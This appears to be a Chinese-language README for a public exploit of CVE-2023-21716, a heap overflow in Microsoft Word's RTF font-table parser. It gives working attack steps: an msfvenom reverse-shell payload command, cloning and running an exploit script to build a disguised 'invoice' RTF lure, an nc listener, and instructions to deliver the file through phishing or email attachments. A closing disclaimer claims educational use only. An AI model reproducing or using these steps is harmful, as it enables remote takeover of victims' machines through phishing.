严重性: 严重 (CVSS 9.8)
受影响版本: Microsoft Word 2013 / 2016 / 2019 / 2021 (未打补丁)
补丁: 微软2023年2月补丁星期二
作者: REGGYRAIDER
CVE-2023-21716 是 Microsoft Word 的 RTF 解析器 (wwlib.dll) 中的一个堆损坏漏洞。
当 Word 解析包含 超过 32 767 个字体条目 的 \fonttbl 指令时,一个内部的 有符号 16 位计数器会发生溢出,从而破坏堆元数据。攻击者只需向受害者发送一个精心构造的 .rtf 文件,即可实现 远程代码执行。
无需宏。除了打开文件外,无需用户交互。
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
通过 SMB、电子邮件附件或任何钓鱼途径上传。
当受害者在未打补丁的 Word 中打开 invoice_march2024.rtf 时,你将获得一个反向 shell。
攻击者创建 RTF Word 解析 \fonttbl 堆被破坏
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl 包含 32769+ 有符号 16 位计数器 攻击者的
字体定义 溢出 → 0x8000 shellcode 运行
\fonttbl 中嵌入了 32 769 个 \f<N> 字体定义。payload.bin)被放置在 \pict 内部,并落入被破坏的区域,当分配器处理它时,就会获得执行权限。此工具仅用于教育目的和授权的渗透测试。
在未拥有或未获得明确书面许可的系统上使用此漏洞是非法的。
作者不对滥用行为承担任何责任。